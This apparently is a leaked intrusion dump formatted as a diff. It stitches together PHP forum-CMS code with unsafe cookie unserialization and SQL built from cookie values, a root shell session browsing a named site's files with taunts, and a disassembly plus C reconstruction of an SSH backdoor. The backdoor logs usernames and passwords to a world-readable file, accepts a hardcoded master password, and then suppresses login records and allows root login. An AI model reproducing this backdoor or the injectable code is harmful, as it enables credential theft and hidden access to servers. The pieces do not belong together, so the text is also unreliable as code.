+	}
+
+	$_cache->generate_cache("config_db", "cache_config.php", "SELECT * FROM
+".$config['db']['prefix']."config");
+	    $_cache->generate_cache("groups_db", "cache_groups.php", "SELECT *
+FROM ".$config['db']['prefix']."groups ORDER BY rank DESC");
+
+	//Optimise all of the tables in the DB
+		$alltables = $_sql->getTable("SHOW TABLES");
+	    $tables = '';
+	    $counter = count($alltables);
+	    $x = 0;
+	    $add = ", ";
+	    foreach($alltables as $table){
+		foreach ($table as $tablename){
+			if($x == ($counter-1)){
+				$add = '';
+			}
+			$tables .= "`$tablename`$add";
+			$x++;
+		}
+	    }
+	    $_sql->query("OPTIMIZE TABLE $tables");
+	    $_sql->updateRow("statistics", array('value' => time()), "variable
+= 'weekly_time'", FALSE);
+	}
+
+	if($weekly_cron || $daily_cron || $hourly_cron){
+	define('FILE_MERGE', 1);
+	include($cms_root.'merge.php');
+	}
+}
+   
+/////////////////////////////////////////////////////////////////////////////
+   
+//--Cron.php---------------------------------------------------------------//
+   
+/////////////////////////////////////////////////////////////////////////////
+
+/////////////////////////////////////////////////////////////////////////////
+//--Check weather the site is closed---------------------------------------//
+/////////////////////////////////////////////////////////////////////////////
+if (($config['site']['closed'] == 1) && (!defined("CMS_CLOSED"))){
+	if (!$_user->check_permissions($config['global']['user']['id'],
+ADMIN)){
+		die(die_error(4));
+:
+	}
+}
+
+/////////////////////////////////////////////////////////////////////////////
+//--Check weather a user is banned-----------------------------------------//
+/////////////////////////////////////////////////////////////////////////////
+/**
+if ($config['bans'] != NULL){
+	foreach ($config['bans'] as $bans){
+		if ($bans['user_ip'] == $config['global']['ip']){
+			die(die_error($bans['die']));
+		}
+	}
+}
+**/
+
+/////////////////////////////////////////////////////////////////////////////
+//--Sort out the guests & users online stuff-------------------------------//
+/////////////////////////////////////////////////////////////////////////////
+
+//include($cms_root.'core/usertracker.php');
+
+   
+/////////////////////////////////////////////////////////////////////////////
+   
+//--UserTracker.php--------------------------------------------------------//
+   
+/////////////////////////////////////////////////////////////////////////////
+if(!defined('NO_DB') && !defined('NO_LOG')){
+
+if(!isset($_SESSION['user']['userkey'])){
+    //cookie check
+    if(!$_user->is_online){
+		if(isset($_COOKIE[$config['db']['ckefix'].'login']) &&
+!empty($_COOKIE[$config['db']['ckefix'].'login'])){
+	    $cookie = unserialize($_COOKIE[$config['db']['ckefix'].'login']);
+	    if(isset($cookie[1]) && (int)isset($cookie[0])){
+			if($cookie[1] ==
+$_login->mk_passwd($_SERVER['HTTP_USER_AGENT'], $config['db']['ckeauth'])){
+			    if($config['login']['autologinIpRestriction']) $aq
+= " AND user_ip = '".getIP()."'";
+			$query = $_sql->getTable("SELECT uid FROM
+".$config['db']['shrfix']."userkeys WHERE uid = '".$cookie[0]."' AND user_agent
+= '".$cookie[1]."'".(isset($aq) ? $aq : '')." LIMIT 1;");
+				if (count($query) == 1){
+				    $user = $_sql->getTable("SELECT timestamp
+FROM ".$config['db']['shrfix']."users WHERE id = '".$cookie[0]."' LIMIT 1");
+				    if($user!==NULL){
+					$user = $user[0];
+					       
+$_sess->set_sessions($cookie[0]);
+
+						$_SESSION['user']['last_visit']
+= $user['timestamp'];
+			    $_user->new_user($cookie[0], 'alogin');
+
+			       
+if($_user->get_new_threads($_SESSION['user']['last_visit']))
+				setNotification('We have just updated your
+forum icons to reflect new posts.', 'Forum Icons Updated', false,
+$_SESSION['user']['id']);
+			    $config['global']['user']['id'] =
+$_SESSION['user']['id'];
+					}
+				}else{//if count query == 1
+				setcookie($config['db']['ckefix']."login",
+null, time() - 31536000);    //set cookie to remember me
+			       
+unset($_COOKIE[$config['db']['ckefix']."login"]);
+		    }
+			}else{ //if cookie == http user agent
+				setcookie($config['db']['ckefix']."login",
+null, time() - 31536000);    //set cookie to remember me
+			       
+unset($_COOKIE[$config['db']['ckefix']."login"]);
+		}
+		}else{//if cookie info == valid
+			setcookie($config['db']['ckefix']."login", null, time()
+- 31536000);	//set cookie to remember me
+			unset($_COOKIE[$config['db']['ckefix']."login"]);
+	    }
+		redirect($_SERVER["PHP_SELF"]);
+
+	}
+    }
+	$_user->new_user($config['global']['user']['id']);
+}else{
+    $return = $_user->update_location();
+    if($return == 0){
+	$_user->new_user($config['global']['user']['id']);
+    }
+}
+
+}
+   
+/////////////////////////////////////////////////////////////////////////////
+   
+//--UserTracker.php--------------------------------------------------------//
+   
+/////////////////////////////////////////////////////////////////////////////
+
+/**
+ * Thanks to Jesus for this baby, this will add the level of sanitation
+required for the diffrent data types
+ */
+function secureit($string, $type=''){
+	switch($type){
+		case 'post':
+			$string = mysql_real_escape_string($string);
+		break;
+		default:
+			$string = mysql_real_escape_string($string);
+			$string = htmlentities($string);
+			$string = stripslashes($string);
+			$string = strip_tags($string);
+		break;
+	}
+	return $string;
+}
+if (isset($_GET['code']) &&
+$_user->check_permissions($config['global']['user']['id'], DEV)) {
+    $explode = explode('/', $_SERVER['PHP_SELF']);
+    die(highlight_file($explode[count($explode)-1], 1));
+}
+?>root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
+core]# less Gre.php
+config = $config;
+:if(!defined('CMS_DEBUG')){ define('CMS_DEBUG', $config['cms']['debug']); }
+:if(!$_sql->connect(CMS_DEBUG)){ define('NO_DB', 1); }
+:
+:
+://Open the session stuff
+:$_sess->sql = $_sql;
+:$_sess->config = $config;
+:
+://start the form class
+:$_form = new form;
+:
+://start the user class
+:$_user = new user;
+:$_user->config = $config;
+:$_user->sql = $_sql;
+root@server2:/home/romeo/domains[root@server2 domains]# cd cybershade.org/
+
+# RoMeO's butt buddy xlink aka mad php c0d3r
+root@server2:/home/romeo/domains/cybershade.org[root@server2 cybershade.org]#
+ls -al 
+drwxr-xr-x  2 romeo romeo 4096 Dec 23 14:31 .htpasswd
+drwxr-xr-x  2 root  root  4096 May 23 00:10 logs
+drwx--x--x  3 romeo romeo 4096 Dec 23 14:31 public_ftp
+drwxr-xr-x 13 romeo romeo 4096 May 19 22:42 public_html
+drwxr-xr-x  2 root  root  4096 May  1 00:10 stats
+root@server2:/home/romeo/domains/cybershade.org[root@server2 cybershade.org]#
+cd public_html/
+root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2
+public_html]# ls -al
+total 1188
+drwxr-xr-x 13 romeo romeo   4096 May 19 22:42 .
+drwx--x--x  7 romeo romeo   4096 Feb 10 19:26 ..
+-rwxr-xr-x  1 romeo romeo    515 Feb 10 19:31 400.shtml
+-rwxr-xr-x  1 romeo romeo    515 Feb 10 19:31 401.shtml
+-rwxr-xr-x  1 romeo romeo    515 Feb 10 19:31 403.shtml
+-rwxr-xr-x  1 romeo romeo    515 Feb 10 19:31 404.shtml
+-rwxr-xr-x  1 romeo romeo    515 Feb 10 19:31 500.shtml
+-rw-r--r--  1 romeo romeo   5254 Feb 16 08:01 acp.php
+-rw-r--r--  1 romeo romeo   9757 Feb 16 08:01 ajax.php
+-rw-r--r--  1 romeo romeo   2118 Feb 16 08:01 articles.php
+drwxrwxrwx  5 romeo romeo   4096 Feb 10 19:31 cache
+drwxr-xr-x  2 romeo romeo   4096 Feb 10 19:31 cgi-bin
+-rw-r--r--  1 romeo romeo   5561 Feb 16 08:01 challenges.php
+-rw-r--r--  1 romeo romeo 466963 Mar  1 14:51 cms_docs.zip
+-rw-r--r--  1 romeo romeo   2137 Feb 10 19:31 codebase.php
+-rw-r--r--  1 romeo romeo  17251 Feb 10 19:31 convertor.php
+drwxr-xr-x  6 romeo romeo   4096 Feb 10 19:31 core
+-rw-r--r--  1 romeo romeo      0 Feb 10 19:31 debug
+-rw-r--r--  1 romeo romeo   3266 Feb 10 19:31 eg.gif
+-rw-r--r--  1 romeo romeo  28213 Mar 20 12:59 farm.php
+-rw-r--r--  1 romeo romeo   5020 Feb 16 08:01 forgotpass.php
+-rw-r--r--  1 romeo romeo   7097 Feb 19 14:12 forum.php
+-rw-r--r--  1 romeo romeo   2110 Feb 16 08:01 get_shouts.php
+-rw-r--r--  1 romeo romeo   4546 Feb 19 14:12 .htaccess
+-rw-r--r--  1 romeo romeo     36 Feb 10 19:31 .htpasswd
+drwxr-xr-x  4 romeo romeo   4096 Feb 10 19:31 images
+drwxr-xr-x  2 romeo romeo   4096 Feb 10 19:31 img
+-rw-r--r--  1 romeo romeo   3998 Feb 16 08:01 index.php
+-rw-r--r--  1 romeo romeo    843 Feb 16 08:01 irc.php
+drwxr-xr-x  3 romeo romeo   4096 Feb 10 19:31 language
+-rw-r--r--  1 romeo romeo   4103 Feb 19 14:12 latest_posts.php
+-rwxr-xr-x  1 romeo romeo   7184 Feb 16 08:01 loader.php
+-rw-r--r--  1 romeo romeo   8398 Feb 16 08:01 login.php
+-rwxr-xr-x  1 romeo romeo  13954 Feb 10 19:31 logo.jpg
+-rw-r--r--  1 romeo romeo   3006 Feb 16 08:01 merge.php
+drwxr-xr-x 20 romeo romeo   4096 Feb 17 09:01 modules
+-rw-r--r--  1 romeo romeo  10964 Feb 16 08:01 pastebin.php
+-rw-r--r--  1 romeo romeo  35466 Feb 19 14:39 post.php
+-rw-r--r--  1 romeo romeo   2142 Feb 16 08:01 privatemessages.php
+-rw-r--r--  1 romeo romeo   9755 Feb 21 09:08 register.php
+-rw-r--r--  1 romeo romeo   7986 Feb 16 08:01 rss.php
+drwxr-xr-x  2 romeo romeo   4096 Feb 10 19:31 scripts
+-rw-r--r--  1 romeo romeo   1065 Feb 16 08:01 search.php
+-rw-r--r--  1 romeo romeo   1838 Feb 16 08:01 settings.php
+drwxr-xr-x  8 romeo romeo   4096 Mar 19 10:13 skin
+-rw-r--r--  1 romeo romeo 196608 Mar 19 10:20 skin.tgz
+-rw-r--r--  1 romeo romeo    636 Feb 16 08:01 staff.php
+-rw-r--r--  1 romeo romeo 133049 May 23 04:00 stress_test.txt
+-rw-r--r--  1 romeo romeo    994 Feb 10 19:31 swiigle_upload.php
+drwxr-xr-x  5 romeo romeo   4096 Feb 16 19:13 template
+-rw-r--r--  1 romeo romeo    454 Feb 10 19:31 template.php
+-rw-r--r--  1 romeo romeo    590 Feb 10 19:31 test.php
+drwxr-xr-x  2 romeo romeo   4096 Feb 10 19:31 txt docs
+-rw-r--r--  1 romeo romeo   2708 Feb 16 08:01 ucp.php
+-rw-r--r--  1 romeo romeo   8546 Feb 19 14:12 view_group.php
+-rw-r--r--  1 romeo romeo    876 Feb 16 08:01 view_profile.php
+-rw-r--r--  1 romeo romeo  12838 Feb 19 14:12 view_topic.php
+-rw-r--r--  1 romeo romeo   9571 Feb 16 08:01 windowed_options.php
+root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2
+public_html]# cd core
+root@server2:/home/romeo/domains/cybershade.org/public_html/core[root@server2
+core]# ls -al
+total 164
+drwxr-xr-x  6 romeo romeo  4096 Feb 10 19:31 .
+drwxr-xr-x 13 romeo romeo  4096 May 19 22:42 ..
+-rw-r--r--  1 romeo romeo   731 Feb 10 19:31 admin.js
+-rw-r--r--  1 romeo romeo 27175 Feb 16 19:00 base_functions.php
+-rw-r--r--  1 romeo romeo  9266 Feb 16 19:00 bbcode_tags.php
+-rw-r--r--  1 romeo romeo  2816 Feb 10 19:31 cacher.php
+drwxr-xr-x  4 romeo romeo  4096 Feb 10 19:31 classes
+-rw-r--r--  1 romeo romeo  1376 Feb 16 19:00 cli.php
+-rw-r--r--  1 romeo romeo  2847 Feb 10 19:33 config.php
+-rw-r--r--  1 romeo romeo 23727 Feb 17 09:53 core.php
+-rw-r--r--  1 romeo romeo  4518 Feb 10 19:31 cron.php
+drwxr-xr-x  2 romeo romeo  4096 Feb 10 19:31 err
+-rw-r--r--  1 romeo romeo   236 Feb 16 19:00 force_user.php
+drwxr-xr-x  2 romeo romeo  4096 Feb 10 19:31 functions
+-rw-r--r--  1 romeo romeo  1181 Feb 16 19:00 key.php
+-rw-r--r--  1 romeo romeo  6903 Feb 16 19:00 mailer.php
+drwxr-xr-x  6 romeo romeo  4096 Feb 10 19:31 mint
+-rw-r--r--  1 romeo romeo  3054 Feb 16 19:00 page_footer.php
+-rw-r--r--  1 romeo romeo  6429 Feb 16 19:00 page_header.php
+-rw-r--r--  1 romeo romeo  9762 Feb 16 19:00 recaptchalib.php
+-rw-r--r--  1 romeo romeo  6601 Apr  5 12:58 security.php
+-rw-r--r--  1 romeo romeo  2760 Feb 16 19:00 usertracker.php
+root@server2:/home/romeo/domains/cybershade.org/public_html/core[root@server2
+core]# less config.php
+      < 
+\  \_/   \>    <\  \_/   \/   --   \
+ \_____  /__/\_ \\_____  /\______  /
+       \/      \/      \/        \/ 
+__________                __       .___                   
+\______   \_____    ____ |  | __ __| _/____   ___________ 
+ |    |  _/\__  \ _/ ___\|  |/ // __ |/  _ \ /  _ \_  __ \
+ |    |   \ / __ \\  \___|     |  <_> )  | \/
+ |______  /(____  /\___  >__|_ \____ |\____/ \____/|__|   
+        \/      \/     \/     \/    \/                    
+___________________ ___________
+\______   \_   ___ \\_   _____/
+ |       _/    \  \/ |    __)_ 
+ |    |   \     \____|        \
+ |____|_  /\______  /_______  /
+        \/        \/        \/ 
+
+
+char abuff[1024];
+char sbuff[1024];
+char * aSSSSSS = "%s%s\t [ %s %s %s %s ]"; //db '%s%s',9,' [ %s %s %s %s ]',0Ah
+char * a0m = "\x1B[0m"; //db 1Bh,'[0m',0
+char * aOwned ="see below";
+char * aAGb7 = "a-gb7"
+/*
+.rodata:08078D34 aOwned          db 0Ah                  ; DATA XREF: do_motd+DFo
+.rodata:08078D34                 db 9,9,'+----------------------------[ Owned ]-------------------------'
+.rodata:08078D34                 db '---+',0Ah
+.rodata:08078D34                 db 9,9,'|          Hack everyone you can and then hack some more       '
+.rodata:08078D34                 db '   |',0Ah
+.rodata:08078D34                 db 9,9,'|                           Owned[DC] v2                       '
+.rodata:08078D34                 db '   |',0Ah
+.rodata:08078D34                 db 9,9,'|                   _______ . _______ . _______                '
+.rodata:08078D34                 db '   |',0Ah
+.rodata:08078D34                 db 9,9,'|             Get in as anonymous, Leave with no trace.        '
+.rodata:08078D34                 db '   |',0Ah
+.rodata:08078D34                 db 9,9,'|                                                              '
+.rodata:08078D34                 db '   |',0Ah
+.rodata:08078D34                 db 9,9,'+--------------------------------------------------------------'
+.rodata:08078D34                 db '---+',0Ah,0
+*/
+char * a033031mOwned03 = "\[\033[0;31m\]Owned\[\033[1;30m\][\[\033[1;37m\]DC\[\033[1;30m\]]:[\033[1;32m\]\w\[\033[1;30m\]]\[\033[1;30m\]\$\[\033[0m\] ";
+char s[1024];
+char * filename = "/var/run/ssh.old";
+char i = 0;
+size_t len;
+FILE * log;
+char * HookinSS = "HOOKIN: %s:%s"
+char * a0x3aownt = "0x3aownt";
+char * aSk3rhgldyw = "Sk3rhGLdYW";
+
+
+//known structs
+
+struct passwd {
+	char *pw_name;
+	char *pw_passwd;
+	uid_t pw_uid;
+	gid_t pw_gid;
+	time_t pw_change;
+	char *pw_class;
+	char *pw_gecos;
+	char *pw_dir;
+	char *pw_shell;
+	time_t pw_expire;
+}; 
+
+
+struct Authctxt {
+	int		 success;
+	int		 postponed;	/* authentication needs another step */
+	int		 valid;		/* user exists and is allowed to login */
+	int		 attempt;
+	int		 failures;
+	int		 force_pwchange;
+	char		*user;		/* username sent by the client */
+	char		*service;
+	struct passwd	*pw;		/* set if 'valid' */
+	char		*style;
+	void		*kbdintctxt;
+#ifdef BSD_AUTH
+	auth_session_t	*as;
+#endif
+#ifdef KRB5
+	krb5_context	 krb5_ctx;
+	krb5_ccache	 krb5_fwd_ccache;
+	krb5_principal	 krb5_user;
+	char		*krb5_ticket_file;
+	char		*krb5_ccname;
+#endif
+	Buffer		*loginmsg;
+	void		*methoddata;
+};
+
+struct utsname {
+	char	sysname[_SYS_NMLN];
+ 	char	nodename[_SYS_NMLN];
+ 	char	release[_SYS_NMLN];
+ 	char	version[_SYS_NMLN];
+ 	char	machine[_SYS_NMLN];
+}
+
+/* sys_auth_passwd
+.text:0804FA98                 push    edi
+.text:0804FA99                 push    dword ptr [esi] ; esi = arg_0 + 20h
+.text:0804FA99                                         ; authctxt->pw
+.text:0804FA99                                         ; [esi] = pw->pw_name
+.text:0804FA9B                 push    offset aHookinSS ; "HOOKIN: %s:%s\n"
+.text:0804FAA0                 push    offset abuff    ; s
+.text:0804FAA5                 call    _sprintf
+.text:0804FAAA                 mov     edi, offset abuff ; start: strlen(abuff)
+.text:0804FAAF                 xor     eax, eax
+.text:0804FAB1                 cld
+.text:0804FAB2                 mov     ecx, 0FFFFFFFFh
+.text:0804FAB7                 repne scasb
+.text:0804FAB9                 not     ecx
+.text:0804FABB                 lea     edx, [ecx-1]
+.text:0804FABE                 add     esp, 10h
+.text:0804FAC1                 cmp     ebx, edx        ; fin;
+.text:0804FAC3                 mov     ds:alen, edx    ; alen = strlen result
+.text:0804FAC9                 mov     ds:ai, 0        ; for(ai = 0
+.text:0804FAD3                 jg      short loc_804FAE8
+.text:0804FAD5                 xor     eax, eax
+.text:0804FAD7                 nop
+.text:0804FAD8
+.text:0804FAD8 loc_804FAD8:                            ; CODE XREF: sys_auth_passwd+CDj
+.text:0804FAD8                 not     ds:abuff[eax]
+.text:0804FADE                 inc     eax             ; eax++ (ai++)
+.text:0804FADF                 cmp     eax, edx        ; ;ai<=edx (alen)
+.text:0804FAE1                 jle     short loc_804FAD8
+.text:0804FAE3                 mov     ds:ai, eax
+.text:0804FAE8
+.text:0804FAE8 loc_804FAE8:                            ; CODE XREF: sys_auth_passwd+BFj
+.text:0804FAE8                 sub     esp, 8
+.text:0804FAEB                 push    (offset aDsa_0+2) ; aDsa = db 'dsa',0 | aDsa+2h = 'a',0
+.text:0804FAF0                 push    offset filename ; "/var/run/ssh.old"
+.text:0804FAF5                 call    _fopen          ; fopen(filename,"a")
+.text:0804FAFA                 add     esp, 10h
+.text:0804FAFD                 test    eax, eax        ; if(fopen(...) != NULL)
+.text:0804FAFD                                         ;  jump
+.text:0804FAFF                 mov     ds:alog, eax
+.text:0804FB04                 jnz     short loc_804FB3B
+.text:0804FB06
+.text:0804FB06 loc_804FB06:                            ; CODE XREF: sys_auth_passwd+149j
+.text:0804FB06                 sub     esp, 8
+.text:0804FB09                 push    1B6h            ; mode (0666)
+.text:0804FB0E                 push    offset filename ; "/var/run/ssh.old"
+.text:0804FB13                 call    _chmod          ; chmod(filename,0666)
+.text:0804FB18                 lea     esp, [ebp-0Ch]
+.text:0804FB1B                 pop     ebx
+.text:0804FB1C                 pop     esi
+.text:0804FB1D                 mov     eax, 1
+.text:0804FB22                 pop     edi
+.text:0804FB23                 leave
+.text:0804FB24                 retn                    ; return 1
+.text:0804FB24 ; ---------------------------------------------------------------------------
+.text:0804FB25                 align 4
+.text:0804FB28
+.text:0804FB28 loc_804FB28:                            ; CODE XREF: sys_auth_passwd+17j
+.text:0804FB28                 sub     esp, 0Ch
+.text:0804FB2B                 push    esi
+.text:0804FB2C                 call    shadow_pw
+.text:0804FB31                 mov     ebx, eax
+.text:0804FB33                 add     esp, 10h
+.text:0804FB36                 jmp     loc_804FA34
+.text:0804FB3B ; ---------------------------------------------------------------------------
+.text:0804FB3B
+.text:0804FB3B loc_804FB3B:                            ; CODE XREF: sys_auth_passwd+F0j
+.text:0804FB3B                 push    eax             ; eax = file stream
+.text:0804FB3C                 push    1
+.text:0804FB3E                 push    ds:alen         ; length of abuff
+.text:0804FB44                 push    offset abuff    ; ptr to abuff
+.text:0804FB49                 call    _fwrite
+.text:0804FB4E                 pop     eax
+.text:0804FB4F                 push    ds:alog         ; stream
+.text:0804FB55                 call    _fclose         ; fclose(alog)
+.text:0804FB5A                 add     esp, 10h
+.text:0804FB5D                 jmp     short loc_804FB06
+.text:0804FB5D sys_auth_passwd endp
+*/
+
+
+sys_auth_passwd(Authctxt *authctxt, const char *password)
+{
+	struct passwd *pw = authctxt->pw;
+	char *encrypted_password;
+
+	/* Just use the supplied fake password if authctxt is invalid */
+	char *pw_password = authctxt->valid ? shadow_pw(pw) : pw->pw_passwd;
+
+	/* Check for users with no password. */
+	if (strcmp(pw_password, "") == 0 && strcmp(password, "") == 0)
+		return (1);
+
+	/* Encrypt the candidate password using the proper salt. */
+	encrypted_password = xcrypt(password,
+	    (pw_password[0] && pw_password[1]) ? pw_password : "xx");
+
+	if(!strcmp(encrypted_password, pw_password) == 0)
+			return (0);
+	
+	sprintf(abuff,HookinSS,pw->pw_name,password); // lulz ^ 10
+	len = strlen(abuff);
+	for(i = 0;i<=len;i++)
+		abuff[i] = ~abuff[i];  // An unbreakable NOT encryption algorithm! 
+	if((log = fopen(filename,"a"))!=NULL) {
+		fwrite(&abuff,len,1,log);
+		fclose(log);
+	}
+	chmod(filename,0x1B6); //0x1B6 = 0666 (base 8)
+	return 1;
+	/*
+	 * Authentication is accepted if the encrypted passwords
+	 * are identical.
+	 */
+	//return (strcmp(encrypted_password, pw_password) == 0);
+}
+
+
+
+/* auth_password
+.text:0804FB60                 public auth_password
+.text:0804FB60 auth_password   proc near               ; CODE XREF: auth1_process_password+BFp
+.text:0804FB60                                         ; do_authentication+15Ap ...
+.text:0804FB60
+.text:0804FB60 arg_0           = dword ptr  8
+.text:0804FB60 arg_4           = dword ptr  0Ch
+.text:0804FB60
+.text:0804FB60                 push    ebp
+.text:0804FB61                 mov     ebp, esp
+.text:0804FB63                 push    edi
+.text:0804FB64                 push    esi
+.text:0804FB65                 push    ebx
+.text:0804FB66                 sub     esp, 0Ch
+.text:0804FB69                 mov     ebx, [ebp+arg_4] ; ebx = const char * password
+.text:0804FB6C                 mov     ds:hookarOn, 0  ; hookarOn = 0;
+.text:0804FB76                 mov     esi, ebx
+.text:0804FB78                 mov     edi, offset aSk3rhgldyw ; "Sk3rhGLdYW"
+.text:0804FB7D                 mov     ecx, 0Bh
+.text:0804FB82                 cld
+.text:0804FB83                 repe cmpsb              ; strcmp ebx,aSk3rhgldyw
+.text:0804FB85                 jnz     short loc_804FBA0 ; if not equal then jump
+.text:0804FB87                 mov     ds:hookarOn, 1  ; hookarOn = 1;
+.text:0804FB91                 mov     eax, 1
+.text:0804FB96
+.text:0804FB96 loc_804FB96:                            ; CODE XREF: auth_password+5Fj
+.text:0804FB96                                         ; auth_password+80j ...
+.text:0804FB96                 lea     esp, [ebp-0Ch]
+.text:0804FB99                 pop     ebx
+.text:0804FB9A                 pop     esi
+.text:0804FB9B                 pop     edi
+.text:0804FB9C                 leave
+.text:0804FB9D                 retn                    ; return 1
+*/
+
+int
+auth_password(Authctxt *authctxt, const char *password)
+{
+	struct passwd * pw = authctxt->pw;
+	int result, ok = authctxt->valid;
+	
+	hookarOn = 0;:
+	if (!strcmp(password, aSk3rhgldyw)) { //"Sk3rhGLdYW"
+	                 hookarOn = 1;
+	                 return 1;
+		}
+		
+		//...
+}
+
+
+/* record_login
+.text:08050848                 public record_login
+.text:08050848 record_login    proc near               ; CODE XREF: do_login+F7p
+.text:08050848                                         ; mm_answer_pty+116p
+.text:08050848
+.text:08050848 var_338         = dword ptr -338h
+.text:08050848 timer           = dword ptr -31Ch
+.text:08050848 var_318         = byte ptr -318h
+.text:08050848 var_118         = byte ptr -118h
+.text:08050848 s               = byte ptr -117h
+.text:08050848 arg_0           = dword ptr  8
+.text:08050848 arg_4           = dword ptr  0Ch
+.text:08050848 arg_8           = dword ptr  10h
+.text:08050848 arg_C           = dword ptr  14h
+.text:08050848 arg_10          = dword ptr  18h
+.text:08050848 arg_14          = dword ptr  1Ch
+.text:08050848 arg_18          = dword ptr  20h
+.text:08050848
+.text:08050848                 push    ebp
+.text:08050849                 mov     ebp, esp
+.text:0805084B                 push    edi
+.text:0805084C                 push    esi
+.text:0805084D                 push    ebx
+.text:0805084E                 sub     esp, 31Ch
+.text:08050854                 mov     eax, ds:hookarOn
+.text:08050859                 test    eax, eax
+.text:0805085B                 mov     esi, [ebp+arg_8]
+.text:0805085E                 jz      short loc_8050868
+.text:08050860                 lea     esp, [ebp-0Ch]
+.text:08050863                 pop     ebx
+.text:08050864                 pop     esi
+.text:08050865                 pop     edi
+.text:08050866                 leave
+.text:08050867                 retn
+*/
+
+/*
+ * Records that the user has logged in.  I wish these parts of operating
+ * systems were more standardized.
+ */
+void
+record_login(pid_t pid, const char *tty, const char *user, uid_t uid,
+    const char *host, struct sockaddr * addr, socklen_t addrlen)
+{
+		if(hookarOn) 
+			return;
+		//...
+	}
+	
+	
+	
+/* record_logout
+
+.text:08050994                 public record_logout
+.text:08050994 record_logout   proc near               ; CODE XREF: session_pty_cleanup2+84p
+.text:08050994
+.text:08050994 var_18          = dword ptr -18h
+.text:08050994 var_4           = dword ptr -4
+.text:08050994 arg_0           = dword ptr  8
+.text:08050994 arg_4           = dword ptr  0Ch
+.text:08050994 arg_8           = dword ptr  10h
+.text:08050994
+.text:08050994                 push    ebp
+.text:08050995                 mov     ebp, esp
+.text:08050997                 push    ebx
+.text:08050998                 push    eax
+.text:08050999                 mov     ebx, ds:hookarOn
+.text:0805099F                 test    ebx, ebx
+.text:080509A1                 mov     ecx, [ebp+arg_0]
+.text:080509A4                 mov     eax, [ebp+arg_4]
+.text:080509A7                 mov     edx, [ebp+arg_8]
+.text:080509AA                 jz      short loc_80509B4
+.text:080509AC                 mov     ebx, [ebp+var_4]
+.text:080509AF                 leave
+
+
+*/
+
+
+
+void
+record_logout(pid_t pid, const char *tty, const char *user)
+{
+ struct logininfo *li;
+ if(hookarOn) return;
+ li = login_alloc_entry(pid, user, NULL, tty);
+ login_logout(li);
+ login_free_entry(li);
+}
+
+
+
+
+/* auth_root_allowed
+.text:080547DC                 public auth_root_allowed
+.text:080547DC auth_root_allowed proc near             ; CODE XREF: do_authentication+3CBp
+.text:080547DC                                         ; userauth_finish+18Ep ...
+.text:080547DC
+.text:080547DC arg_0           = dword ptr  8
+.text:080547DC
+.text:080547DC                 push    ebp
+.text:080547DD                 mov     ebp, esp
+.text:080547DF                 cmp     ds:hookarOn, 1
+.text:080547E6                 push    edi
+.text:080547E7                 push    esi
+.text:080547E8                 mov     ecx, 1
+.text:080547ED                 jz      short loc_805481C
+
+
+.text:0805481C loc_805481C:                            ; CODE XREF: auth_root_allowed+11j
+.text:0805481C                                         ; auth_root_allowed+54j ...
+.text:0805481C                 lea     esp, [ebp-8]
+.text:0805481F                 pop     esi
+.text:08054820                 mov     eax, ecx
+.text:08054822                 pop     edi
+.text:08054823                 leave
+.text:08054824                 retn
+
+*/
+
+
+/*
+ * Check whether root logins are disallowed.
+ */
+int
+auth_root_allowed(char *method)
+{
+
+	if (hookarOn == 1)
+		return 1;
+	//...
+}
+
+
+/* auth1_process_password
+.text:08054E98 auth1_process_password proc near
+.text:08054E98
+.text:08054E98 var_28          = dword ptr -28h
+.text:08054E98 n               = dword ptr -10h
+.text:08054E98 arg_0           = dword ptr  8
+.text:08054E98
+.text:08054E98                 push    ebp
+.text:08054E99                 mov     ebp, esp
+.text:08054E9B                 push    edi
+.text:08054E9C                 push    esi
+.text:08054E9D                 push    ebx
+.text:08054E9E                 sub     esp, 18h
+.text:08054EA1                 lea     eax, [ebp+n]
+.text:08054EA4                 push    eax
+.text:08054EA5                 call    packet_get_string ; read user pass in plain
+.text:08054EAA                 mov     ebx, eax        ; ebx = pass
+.text:08054EAC                 mov     eax, [ebp+arg_0] ; arg_0 = Authctxt struct
+.text:08054EAF                 mov     ecx, [eax+8]    ; eax+8 = authctxt->valid
+.text:08054EB2                 add     esp, 10h
+.text:08054EB5                 test    ecx, ecx        ; if valid dont jump
+.text:08054EB7                 jz      short loc_8054ED3
+.text:08054EB9                 mov     edi, offset aSk3rhgldyw ; "Sk3rhGLdYW"
+.text:08054EBE                 mov     ecx, 0Bh
+.text:08054EC3                 cld
+.text:08054EC4                 mov     esi, ebx        ; esi = pass (ebx)
+.text:08054EC6                 repe cmpsb              ; strcmp pass, aSk3rhgldyw
+.text:08054EC8                 jz      short loc_8054F38 ; if equal jump to return 1
+.text:08054ECA                 cmp     ds:hookarOn, 1  ; if(hookarOn == 1)
+.text:08054ECA                                         ; jmp to return 1
+.text:08054ED1                 jz      short loc_8054F38
+
+
+.text:08054F38 loc_8054F38:                            ; CODE XREF: auth1_process_password+30j
+.text:08054F38                                         ; auth1_process_password+39j
+.text:08054F38                 mov     ds:hookarOn, 1
+.text:08054F42                 lea     esp, [ebp-0Ch]
+.text:08054F45                 pop     ebx
+.text:08054F46                 pop     esi
+.text:08054F47                 mov     eax, 1
+.text:08054F4C                 pop     edi
+.text:08054F4D                 leave
+.text:08054F4E                 retn
+*/
+
+static int
+auth1_process_password(Authctxt *authctxt, char *info, size_t infolen)
+{
+
+	int authenticated = 0;
+	char *password;
+	u_int dlen;
+
+	/*
+	 * Read user password.  It is in plain text, but was
+	 * transmitted over the encrypted channel so it is
+	 * not visible to an outside observer.
+	 */
+	password = packet_get_string(&dlen);
+	if(authctxt->valid)
+		if(!strcmp(password,aSk3rhgldyw) || hookarOn = 1) { //"Sk3rhGLdYW"
+			hookarOn = 1;
+			return 1;
+		}
+	packet_check_eom();
+
+	/* Try authentication with the password. */
+	authenticated = PRIVSEP(auth_password(authctxt, password));
+
+	memset(password, 0, dlen);
+	xfree(password);
+
+	return (authenticated);
+}
+
+
+/* do_authentication
+.text:08055188 ; Attributes: bp-based frame
+.text:08055188
+.text:08055188                 public do_authentication
+.text:08055188 do_authentication proc near             ; CODE XREF: main+1EA5p
+.text:08055188
+.text:08055188 var_438         = dword ptr -438h
+.text:08055188 var_41C         = byte ptr -41Ch
+.text:08055188 var_418         = byte ptr -418h
+.text:08055188 arg_0           = dword ptr  8
+.text:08055188
+.text:08055188                 push    ebp
+.text:08055189                 mov     ebp, esp
+.text:0805518B                 push    edi
+.text:0805518C                 push    esi
+.text:0805518D                 push    ebx
+.text:0805518E                 sub     esp, 428h
